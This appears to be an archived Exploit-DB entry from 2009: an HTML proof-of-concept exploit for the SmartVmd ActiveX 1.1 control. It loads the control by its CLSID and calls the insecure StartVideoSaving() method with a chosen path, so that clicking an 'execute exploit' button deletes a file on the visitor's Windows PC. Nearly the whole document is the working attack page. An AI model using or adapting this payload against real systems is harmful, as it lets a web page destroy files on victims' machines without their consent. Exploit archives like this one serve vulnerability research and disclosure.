SmartVmd ActiveX 1.1 - Remote File Deletion

EDB-ID:

7827

CVE:



Author:

Houssamix

Type:

remote


Platform:

Windows

Date:

2009-01-19


<HTML>
<BODY>

<b>   
	Author : Houssamix    <br/>  <br/>  <br/>

   	SmartVmd ActiveX V 1.1 remote file deletion exploit    <br/>

	download : http://www.smartvmd.com/setup/SetupActiveXVmd.msi  <br/>

	Note : StartVideoSaving() insecure method allowed us to delete files in pc vitime  <br/>

<b/>


<object id=hsmx classid="clsid:{E3462D53-47A6-11D8-8EF6-DAE89272743C}"></object>

<SCRIPT>
/*

Report for Clsid: {E3462D53-47A6-11D8-8EF6-DAE89272743C}
RegKey Safe for Script: Faux
RegKey Safe for Init: Faux
Implements IObjectSafety: Vrai
IDisp Safe:  Safe for untrusted: caller  

*/
function hehe()
 {
     File = "c:\\hsmx.txt"
   hsmx.StartVideoSaving(File)
 }

</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>

# milw0rm.com [2009-01-19]